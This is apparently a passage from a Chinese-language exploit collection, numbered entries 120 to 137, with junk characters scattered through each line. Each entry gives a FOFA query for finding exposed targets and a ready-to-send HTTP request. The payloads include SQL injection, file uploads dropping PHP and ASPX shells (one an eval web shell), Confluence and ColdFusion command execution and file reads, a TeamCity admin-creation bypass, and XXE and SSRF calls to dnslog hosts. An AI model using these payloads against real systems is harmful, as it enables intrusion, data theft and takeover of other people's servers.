. \5 r- B7 F( F) X: K& jCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
7 o8 n$ w( l" S8 ^/ L& KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
' s  p! i5 N1 C& wAccept: */*
2 ^/ v  \) @- h- k: oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  @# R" I4 M" i8 ]2 X  T
Accept-Encoding: gzip, deflate
+ W( q9 _3 r' H) `+ |, A5 {3 wContent-Type: application/x-www-form-urlencoded;
  o  S5 m3 r: g9 T7 E0 ^Content-Length: 109. e# ]% J1 P9 v2 J* {) C
Origin: https://58.18.133.60:8443
4 z! b) w4 T9 P! t1 x5 vReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php; @8 T0 `$ u+ ^4 T4 R$ ~. \- w0 k
Sec-Fetch-Dest: empty
; r& m* `0 j5 H) }" L7 j) y- jSec-Fetch-Mode: cors: ~9 q. v% ]* H2 ^; ^9 ?9 {1 b1 ~! i
Sec-Fetch-Site: same-origin
8 q' ~( F3 v0 F+ r& y0 zX-Forwarded-For: 1.1.1.1
# |% p7 f$ A& @$ [- o4 ]X-Originating-Ip: 1.1.1.1
1 k: H, x$ J3 d9 P8 a9 aX-Remote-Ip: 1.1.1.1* r; m7 K! F7 J0 b' Y1 H
X-Remote-Addr: 1.1.1.1; n  }# Q; ]8 s7 R$ Y5 I( ?3 o
Te: trailers
% N2 |. Q+ `  PConnection: close
2 |, Y& Y! P+ q
3 y# {) j1 ]+ R  R' i& a/ tsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|1234562 J" _8 R8 s9 i' I

% ]2 z* a! B1 n% j
% `. u; i, r+ q/ g! F! u120. 北京百绰智能S40管理平台导入web.php任意文件上传
, w7 T- f7 j9 u# y6 uCVE-2024-12537 o/ C( Z. S) \2 i1 l6 a( H
FOFA:title="Smart管理平台"  m( Q9 G$ p& |( K/ e& ~- @
POST /useratte/web.php? HTTP/1.1+ \3 U7 v8 r1 h8 ?
Host: ip:port" u6 S' b  }% [5 I  R9 y: \
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
& U. {+ |, P( J+ h9 z1 JUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
% k1 m% o' X0 q3 SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; E; I; M& D" M1 i  l9 I, eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. Q# v5 Z& v& P- w7 w" D" N3 p4 o
Accept-Encoding: gzip, deflate
: B. Y5 o' x  {( J: K1 `Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328+ g( n* e6 P& m" O) a
Content-Length: 597
% M$ t& L( C1 g. [4 D; k4 IOrigin: https://ip:port9 D/ [) l. f$ G% W' Q4 w
Referer: https://ip:port/sysmanage/licence.php: Q. y* h' y8 f
Upgrade-Insecure-Requests: 1
" |! m8 a) ]/ f4 i# A( J' W, ZSec-Fetch-Dest: document
, K5 ^: G3 v6 hSec-Fetch-Mode: navigate! O+ o% T. `+ k5 C2 C
Sec-Fetch-Site: same-origin
3 d1 U+ G& v" N0 y( _Sec-Fetch-User: ?1
0 w/ T# |5 n- t0 Y/ [  L0 q, wTe: trailers/ e7 d/ [+ ~+ o8 L: {7 q8 Q. a
Connection: close
! l2 B& a; |7 h5 h: Z; l( W& ], i! k
-----------------------------42328904123665875270630079328/ O% ?" y$ ~5 K1 r
Content-Disposition: form-data; name="file_upload"; filename="2.php"9 U% Q1 I( [0 s1 u) C
Content-Type: application/octet-stream
" A$ f. j, X3 ~$ v
1 v+ ~- Y0 @; p- H<?php phpinfo()?>
/ }, ]: ?1 M0 W. E-----------------------------42328904123665875270630079328& G* R7 O3 k+ _! Q2 ]- P0 y# I
Content-Disposition: form-data; name="id_type"3 G$ h' h1 Y& B, F: ~
3 o  K  Q" p, A2 I; M* h5 Y
1  y; X( d" B, [
-----------------------------42328904123665875270630079328& ]& i0 W  F' G" y0 @% x# C( j- t
Content-Disposition: form-data; name="1_ck"
$ X" o; N$ c( \/ K2 h! f1 \, D$ F. H& ^! J7 X
1_radhttp1 l* P0 e/ E9 W  U5 r
-----------------------------42328904123665875270630079328
3 Z' z' k, i- s) ~- P# g' Y# q! sContent-Disposition: form-data; name="mode"6 l# N! B; q  r& H8 C1 ~

$ `7 {, `/ X+ P7 a  c( G; |1 F- ?3 wimport
6 A  @) H' f% q& z-----------------------------423289041236658752706300793283 D& F3 x3 H1 b" \" f
9 {" v- q# u& d6 z" a  V& X
) s3 _0 s: L8 _4 @5 s
文件路径/upload/2.php
/ ^1 L3 C5 T' k' @9 F' ~! F4 U( v
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
, |7 k  P5 R% g$ ?6 n, qCVE-2024-1918
( ], j! y5 ]- u, J) A9 M, bFOFA:title="Smart管理平台", R9 U; m, R- i2 s$ v7 l
POST /useratte/userattestation.php HTTP/1.14 C5 ~" q- K* D2 n/ C, I
Host: 192.168.40.130:8443
4 ^6 ?1 k- j: S/ G' o# hCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
; K3 ~4 j9 i2 HUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
3 L( T* a* G. B" j/ kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) P0 @" H- J3 U1 hAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ y; V: _; d, y: v
Accept-Encoding: gzip, deflate
) I3 C: a% _7 J+ j; uContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
% _- j3 M; h4 p! x8 R+ j7 j' jContent-Length: 592: A- q0 d7 n6 z! W! h1 \' \* U/ W
Origin: https://192.168.40.130:8443
( w4 z( m' A+ P3 X  p' lUpgrade-Insecure-Requests: 1
0 e$ f. k: @( g8 XSec-Fetch-Dest: document
4 ^: q# y5 O- v' ~0 o3 T) `" XSec-Fetch-Mode: navigate5 Z) t5 p9 b% \$ E  G3 q3 c/ M9 Q
Sec-Fetch-Site: same-origin8 y- |; x0 z3 B# Y( v6 E% [+ Q
Sec-Fetch-User: ?1
! v8 v( v  C8 Y) ?& S, WTe: trailers1 `- `0 ]* e, V5 a) V/ ]& Y
Connection: close5 ^$ x8 H& [1 d. f. R4 z# K, @

& L7 i8 l$ p" i-----------------------------423289041236658752706300793287 g$ D- e. p) U6 Y9 N% @% @
Content-Disposition: form-data; name="web_img"; filename="1.php"7 g' ]. C7 G# `# F3 D* h
Content-Type: application/octet-stream
$ Y* Q) W% i( |- r8 z% q3 R' F4 Z% M: S: L+ d! E9 n2 @
<?php phpinfo();?>0 x1 u- n  a2 Z: N! }* K0 j
-----------------------------423289041236658752706300793282 A2 q2 |! E% Y( m  I9 D! e) U6 K
Content-Disposition: form-data; name="id_type"" q( W3 a1 S$ T

! A8 p0 L7 d) P8 d12 T- B* t, c" z% |
-----------------------------42328904123665875270630079328& B; q, t" E, I+ ~& i2 {: M7 o
Content-Disposition: form-data; name="1_ck"
' D1 |' F' W& j. _! H
1 ~/ n7 A1 F8 {' C/ m8 \1_radhttp+ s0 v; z6 j$ T) s0 h5 R, z
-----------------------------42328904123665875270630079328
( p) U: t8 E8 Z5 C6 WContent-Disposition: form-data; name="hidwel"  K3 O+ j: Z5 e% H+ V0 Y8 s" c

+ B; H1 K5 K4 f% Fset' j/ q- ^5 t8 N. m! P4 X) v
-----------------------------42328904123665875270630079328
& h0 o- k2 u% H" b+ O( Q( G2 d5 h
+ l0 t  L8 h( ^/ W, ^7 |5 V# g" U! Y. ^4 s% q; u. s
boot/web/upload/weblogo/1.php  f& |: q% ], m& d) n+ T& n& P' \
. E8 Y. Y1 y3 N- c. V' @( \6 p0 [+ q
122. 北京百绰智能s200管理平台/importexport.php sql注入: z& R& e* D! L' G8 P! C
CVE-2024-27718FOFA:title="Smart管理平台"
2 `* p( E4 o+ P. T! _* ]其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
, u' q! h9 j0 G! fGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
- e9 N- Z7 _, r+ w2 \7 x) q( aHost: x.x.x.x$ J4 {8 x7 M3 t  g( b, F! o
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc04 X$ k3 ~4 Q" K9 N9 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0+ l3 k% N+ P4 _$ e) v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) z2 X4 q$ E+ h, [6 i% MAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) \1 n7 e" f) L% T) ?
Accept-Encoding: gzip, deflate, br
) n" |% U* ]. h" aUpgrade-Insecure-Requests: 19 N* g& b. T: z% D. q& l4 a4 \
Sec-Fetch-Dest: document& z2 x. y: l: Z* w- P
Sec-Fetch-Mode: navigate9 [! ^) h4 c7 u2 }% M8 O
Sec-Fetch-Site: none
7 F6 `/ _& u( Q" [4 X7 q7 z1 J2 lSec-Fetch-User: ?1
* X3 `; f1 B) w) F6 E) W& gTe: trailers
/ c! [* T: m- d" h3 KConnection: close
2 K. H* |1 ]4 }9 b7 V: C. [( ]
  ~# e8 w* k/ ]. w3 x& I, M2 F" }. ?6 U
123. Atlassian Confluence 模板注入代码执行
! v3 W) C/ r: L6 }FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"5 M0 q8 Y- n  I0 s7 {5 d
POST /template/aui/text-inline.vm HTTP/1.18 J; H4 ~9 s( z, M. S4 o
Host: localhost:8090& I$ g5 ]% }9 l- X, g
Accept-Encoding: gzip, deflate, br2 X" P$ f$ z8 I4 |9 K* q
Accept: */*
" w# q! J7 _4 \8 g/ dAccept-Language: en-US;q=0.9,en;q=0.8
+ g* q& X. Y3 o( S: }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.362 ]( g( N! o/ U0 ~* ?7 l2 J
Connection: close
# \1 D2 I. \7 vContent-Type: application/x-www-form-urlencoded
  d5 `; \1 s9 M0 X1 l+ G
2 J5 g, I6 w& A; C/ Nlabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))2 K0 B! U( s: _

" z: f& C0 |7 t$ W! T! n$ v' C8 l, e7 ~7 H4 x5 M0 a" z, y# A
124. 湖南建研工程质量检测系统任意文件上传' V! Q% ^4 K0 g0 g
FOFA:body="/Content/Theme/Standard/webSite/login.css"
3 B9 z. n; W8 A& M9 sPOST /Scripts/admintool?type=updatefile HTTP/1.1
3 i& B) z( J& j6 l% wHost: 192.168.40.130:8282
6 t- _* R; l/ E. DUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.364 p3 P, k, m. O1 S7 x
Content-Length: 72
2 q+ u1 j2 H2 f$ PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8- X1 H4 Q; v' s" r7 D
Accept-Encoding: gzip, deflate, br% H  H' U' K" v: }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* |; }0 g5 T! d5 c7 M: p: Q0 yConnection: close
1 X+ o' t3 d2 ?% g7 e. cContent-Type: application/x-www-form-urlencoded
! r; A  j1 K0 D! q/ N0 B1 j$ B* s, ?4 j' ], S2 T9 d, M4 P4 s+ q
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>4 q( P9 L- z( }. q) e

2 v! z- g$ J) \% o2 g2 V3 t- H* Z- |; l- j2 ~# O5 o3 z& Z- F  s
http://192.168.40.130:8282/Scripts/abcgcg.aspx
) J& o0 }. i& f2 x7 v: z( h% p4 ]+ a7 t0 b/ k% o) {4 Z: A% t
125. ConnectWise ScreenConnect身份验证绕过
: s' A! X; u$ o" L' ]CVE-2024-1709
% _) p0 a# m: s) ^: bFOFA:icon_hash="-82958153"
9 W1 {5 N+ _) ^% zhttps://github.com/watchtowrlabs ... bypass-add-user-poc, A$ ?/ n, `# m1 [# l

% V9 z! E( ^( q" |0 v6 Z9 E7 f1 N4 `# W
使用方法
4 |9 ?5 X# l. |& C6 T6 Upython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
& b4 l' T3 A9 n' O0 @
: J8 Y* J9 U; j2 r5 g/ [, ^% a- [- l% }3 K0 d+ K( Z8 F6 v
创建好用户后直接登录后台,可以执行系统命令。1 m2 T! i/ L8 `# W/ Z4 z9 g$ F

: a8 _' M. m3 U( Q8 Y) D126. Aiohttp 路径遍历( l' f. w# h% O. i$ t
FOFA:title=="ComfyUI", C8 j, M: k! e: `8 ?8 h; P
GET /static/../../../../../etc/passwd HTTP/1.1
  H+ T9 ~3 M" g! g4 I: XHost: x.x.x.x
3 w. U% ~8 m6 N) GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.360 ~8 H4 X5 [  ?) ?1 h
Connection: close
( a# ?- f8 j3 XAccept: */*& H/ G% N( A2 ]1 @% V5 i
Accept-Language: en
, b  R' V$ C' ~* p% pAccept-Encoding: gzip
1 y) i  T6 B6 L4 ~- E8 f4 K; X  E& `$ e( q4 y) H. E

! f& g0 v" C& B4 u* t% i127. 广联达Linkworks DataExchange.ashx XXE
9 f( C( w1 |7 u! f1 i8 QFOFA:body="Services/Identification/login.ashx"
0 E7 J- k# y5 H- x& [1 a/ VPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1* }- H* L; k0 N! e( Q. }
Host: 192.168.40.130:8888
: n2 e# a+ w- [5 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36' P( F# _% R/ x; `/ R$ ]
Content-Length: 415
9 B+ W" P6 C" r3 Q# lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. g3 B3 e9 r% ~+ GAccept-Encoding: gzip, deflate$ z# L) Y& }' D* T/ |9 v% h
Accept-Language: zh-CN,zh;q=0.9
4 x8 W( H7 r1 r: E' NConnection: close- K9 l" U+ I# S0 j
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0" D6 D1 g: t" t2 n7 j: B
Purpose: prefetch, u0 b( N7 m# q$ i7 G: k7 b
Sec-Purpose: prefetch;prerender2 n2 N8 ]2 M% a1 E) L$ \8 @7 J
0 b) Z/ r) n) g* B; {
------WebKitFormBoundaryJGgV5l5ta05yAIe04 Z* W# b* {. L! C, Y: s8 \' [
Content-Disposition: form-data;name="SystemName"
( p0 R8 D# o8 V, J+ m+ r" O* h2 _6 n# |- v
BIM  m3 k$ W4 a( M  g) C
------WebKitFormBoundaryJGgV5l5ta05yAIe0
% A. r  B% X2 aContent-Disposition: form-data;name="Params"
4 ?7 ^5 Z7 K4 j* p9 H# eContent-Type: text/plain! W. Q2 q, o/ M! w& z' o

) T9 R0 K0 d: k3 [# [<?xml version="1.0" encoding="UTF-8"?>
6 Y8 I$ U: R3 ^# z' P# \<!DOCTYPE test [
; {% M0 ]2 a0 U& ~/ Y( H- C<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
/ f! a" c' l2 |1 m8 h]5 C0 b8 u* p7 B9 q6 c/ M- W+ |
>! z  ~$ `% E8 S; M, X# r- W
<test>&t;</test>, H. @. I% T& S9 P2 I) _
------WebKitFormBoundaryJGgV5l5ta05yAIe0--
" @$ X, M# H: U5 B# E9 ?, r
' g2 _$ c8 q1 t* K
0 S+ ^# w' @/ C, w2 u9 T3 b
2 X; {$ b% Y8 A/ f! _' i128. Adobe ColdFusion 反序列化
# b: s+ F' D1 ?) ECVE-2023-38203# R3 N$ T9 V3 E, a2 {9 ~' l
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
* _. }7 z6 S" C5 q5 n3 l6 B, HFOFA:app="Adobe-ColdFusion"6 l) i1 ~+ p( ^# C
PAYLOAD+ T# _3 z8 |" l/ y- I
/ y+ I0 I0 D5 [) A2 W8 S! X) }
129. Adobe ColdFusion 任意文件读取6 F, J# ]; r' {
CVE-2024-207678 [% _) b) |  ~' ?
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"% `3 [. V; N: U
第一步,获取uuid# F2 w2 f" ^- q- {
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
3 ]* r6 ^1 E/ x) Y6 g# e& y# QHost: x.x.x.x
  |  S. z. e6 L' i! XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
8 R- Y9 S1 r+ ^; Z8 ]# [Accept: */*7 z0 G" ?- h9 E# l5 y. x) g
Accept-Encoding: gzip, deflate
# k( |7 C. O/ k7 b3 I' @. WConnection: close9 h  d% g, w# L
5 G* ]( m: g9 u

" n( {! }' }# q% i9 \第二步,读取/etc/passwd文件
: r& c- X& F* U, b. Q' V# vGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1# m; E$ K+ U+ c& b& c
Host: x.x.x.x
. @  d% f% D$ }) w& S% Z5 q' JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
5 ]' f5 T9 b& V( F3 e" b. ^, x1 pAccept: */*" `  D! k- A% l
Accept-Encoding: gzip, deflate
) b; M& I4 r, _% i# D9 uConnection: close1 N0 \1 u& J& ?
uuid: 85f60018-a654-4410-a783-f81cbd5000b97 I% v7 P: t1 S5 D& ]
7 U) W. `) K1 F" P

- u% l2 f7 y# a: m9 w/ Z130. Laykefu客服系统任意文件上传
; H* F1 |0 l$ a1 A5 p$ @FOFA:icon_hash="-334624619"
! x6 R+ _# R' IPOST /admin/users/upavatar.html HTTP/1.14 n! [! G4 X$ ~) l) `7 L: G/ P
Host: 127.0.0.1
& \0 ^- a/ l' A' v% GAccept: application/json, text/javascript, */*; q=0.01
3 Q6 m" {  t$ p! f3 T- V7 [X-Requested-With: XMLHttpRequest3 ?% b  z$ w$ K( C9 r; V$ m
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26, U# S0 O: r7 l1 _! A1 O% N/ f
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR" @; m" L0 v7 o
Accept-Encoding: gzip, deflate! R: L1 V  Z; h3 u. y% I; _& |0 d; I+ O
Accept-Language: zh-CN,zh;q=0.97 p/ g1 i7 p) @9 \* F
Cookie: user_name=1; user_id=3- w( v. |$ I4 A6 h* x
Connection: close
8 ?6 o! g' c' C5 d5 {/ ]+ ?% h; R( m  T3 n& P9 X6 X
------WebKitFormBoundary3OCVBiwBVsNuB2kR7 i2 ?6 V. p. d$ i7 h" a) e
Content-Disposition: form-data; name="file"; filename="1.php"
' R( D- v6 J/ }% Y: yContent-Type: image/png# V# z1 j) N; L; c" t
- C- M; W: O6 o! |, w9 t
<?php phpinfo();@eval($_POST['sec']);?>6 i* N. P8 Z* I" ~% O$ u9 N. y
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
  @' P  X8 i# D( e- {' Q
, X) L0 y* u* e
/ {2 W( r* v' g" w1 ^1 V131. Mini-Tmall <=20231017 SQL注入$ n' d- v0 q5 Q0 H% P$ ~3 [+ F
FOFA:icon_hash="-2087517259"* y$ N1 T8 w/ N0 M4 z9 U
后台地址:http://localhost:8080/tmall/admin- K% q; ?+ J4 C( G/ u9 M. u
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)7 p1 r0 ?! I' Z! o3 r; A/ p, f, n. ^0 P

$ o; x7 Q) ]" F  b+ [5 e132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
0 n) {3 x8 a. k3 r% x: k9 pCVE-2024-27198, P* @4 ~3 r6 ~& O7 e7 Y
FOFA:body="Log in to TeamCity", r  w+ k+ l6 c. f7 Q
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.18 |- d% d* ~. e6 h" p5 S8 _
Host: 192.168.40.130:81115 {$ ^' t  x* Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.367 J3 h$ B' g$ C3 v+ @
Accept: */** ?: M' u. h" a# \" u" Z" B
Content-Type: application/json
1 e: h0 v" T" T5 L: ?Accept-Encoding: gzip, deflate, k- v: Y3 e+ l3 b# o3 F& j
; Z  @% @) O6 Q) R% N
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
0 g6 p9 R# X- o6 G8 A- y4 M
  b" X' S9 O8 ?% L# L% i- j3 Q; ?7 C, {/ R5 H- s" d
CVE-2024-27199- u  p. }# D- ?" a2 |7 \3 |* t. [
/res/../admin/diagnostic.jsp
8 J' v0 ^0 @0 [' G3 Y/.well-known/acme-challenge/../../admin/diagnostic.jsp
, Q# P5 C) g% y8 y; H* ?: A/update/../admin/diagnostic.jsp
) `( `; A# r8 t8 `8 r3 _, l1 V& a" J: O& V+ c& q" r6 S+ ^
* e  {3 j& l6 w+ q$ V
CVE-2024-27198-RCE.py
, O2 }' r" B) R( }- ~3 ], R$ R2 A/ q- H1 t4 {2 ~8 j8 A
133. H5 云商城 file.php 文件上传- @5 o- p7 d  o
FOFA:body="/public/qbsp.php"
( [% R/ N  v1 }7 u, h* UPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1
2 Z7 D& I4 X8 Y* R4 OHost: your-ip1 b" ~- c' I& I- ]5 t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
' B+ [. I9 ~; s9 l: `6 N1 EContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
" F: G" t; H3 m) L' F$ F# z( v1 p9 u$ E2 c
------WebKitFormBoundaryFQqYtrIWb8iBxUCx. c; v! d6 C# l; l  ~5 N  x5 q
Content-Disposition: form-data; name="file"; filename="rce.php"0 Y# l" l- S, t' {
Content-Type: application/octet-stream1 s/ Q: V6 ]: S2 n' \$ L3 S! W9 M

; w, H% f* F6 [3 y" e7 d<?php system("cat /etc/passwd");unlink(__FILE__);?>1 z. Y7 C( ]% _, O' ]% U. M$ k) m* U  h1 o. d
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--! v! G" q0 E. P( z( r8 K
# T# B; T9 C( V1 Q/ g6 z( z& Z

- |9 R9 |2 g9 g- [+ f8 F) g" i+ H' \2 _& G& L" Y2 z9 b- x/ t
134. 网康NS-ASG应用安全网关index.php sql注入0 N1 f& [$ V0 }
CVE-2024-2330
8 t9 c) _# b. b+ l* E# QNetentsec NS-ASG Application Security Gateway 6.3版本
  S0 ^8 L, L9 i0 V9 n# Q) q/ A6 P& DFOFA:app="网康科技-NS-ASG安全网关"4 Z3 P  d& N) u$ ?6 Y, F
POST /protocol/index.php HTTP/1.1
: a  F! c/ Q; ?Host: x.x.x.x$ n4 A! H' c1 f: [  w
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
- T8 U* i9 ^! ]2 yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
4 g0 A) `+ }4 uAccept: */*: q. F" |; X- f4 s* ]3 T/ Q) W
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. Q# h  o7 G2 S5 |5 [- ~- A
Accept-Encoding: gzip, deflate
+ {% G; m5 v  e3 k; ^1 aSec-Fetch-Dest: empty
5 L% [: V% G- I/ C7 A! h2 @5 WSec-Fetch-Mode: cors8 a6 ?3 J$ v0 Y
Sec-Fetch-Site: same-origin$ n8 U0 o/ F$ P1 g1 x; c0 s( a
Te: trailers5 v0 U  M) }5 C& R+ m
Connection: close: c; k& ~/ L- B+ f! G" D
Content-Type: application/x-www-form-urlencoded7 K0 \; e2 w8 E! n
Content-Length: 2631 X3 Y& [2 c% t, i" p) |

8 l: V- Z/ I' ~5 N, M( P6 D4 Xjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}& `2 g9 m8 M; c) L4 u

- E7 y0 o. L, A6 U) T! \% Q
) i2 A1 z7 q1 _" _135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入- Y  b( I$ S+ i7 V/ |$ i. Z  a' c& @
CVE-2024-2022
- \0 `! I( O* z7 Y) bNetentsec NS-ASG Application Security Gateway 6.3版本9 `" X& ?* o* v# G
FOFA:app="网康科技-NS-ASG安全网关"( k4 L2 X. I( \( |
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1  U# H* O, ]8 O
Host: x.x.x.x
5 h2 Z/ k9 p% v  W' S! n& TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36  h9 l+ a; ?* h3 g1 B0 l1 E+ A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 B1 I, }: @) d+ \' ?! F4 a  O1 xAccept-Encoding: gzip, deflate
  X$ w# ^. q9 B7 i+ GAccept-Language: zh-CN,zh;q=0.9
7 Q! U. k5 N6 d* z5 ^) }1 e6 YConnection: close
4 K9 [+ s/ E1 s, R% d3 C
2 ?0 {7 D3 S$ A( c$ R; @7 j( R, ?
, e$ l9 Q* w* {% D136. NextChat cors SSRF
$ a+ p. \- p2 pCVE-2023-497855 O- }" S; k' a4 u9 G  s2 t( l: k7 Q5 p
FOFA:title="NextChat"6 J2 l3 }+ V& f4 a0 ~' @5 c
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1  ]3 R: Y; b5 ~8 o: S+ t
Host: x.x.x.x:10000
/ v( m3 ]7 F/ N2 v% V& J7 HUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.363 o' T, J1 \9 L0 C3 W3 c. \
Connection: close
- i6 l$ ?5 B8 T4 A! z! \/ u2 G5 CAccept: */*% t7 h( W8 T2 ~3 g
Accept-Language: en0 ~+ `; x' M1 Z, A. m
Accept-Encoding: gzip7 V5 H/ D6 [& G  J; G
' [  R1 v$ c! k9 [  D

8 D3 R: Z7 z% Z4 i3 a3 p# M137. 福建科立迅通信指挥调度平台down_file.php sql注入! }6 A5 q2 Z) [0 K9 Z' o  b1 c
CVE-2024-2620
. `+ j+ m- \' Z8 c, H7 f( q1 ~FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
- W( c# }# s' [- h5 LGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
  P$ b$ S0 P% h; `/ FHost: x.x.x.x3 ]) ]1 n# W5 k1 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.03 h: D1 H7 r3 r& H* M5 G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. T9 u2 Y/ i+ K; D1 {
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. h, g6 m2 ]$ r1 q6 v% CAccept-Encoding: gzip, deflate, br
  h: ]% l+ y6 z, cConnection: close1 w: ?7 }: J: \! X* j1 I
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj6 X! j, u) |' d4 G
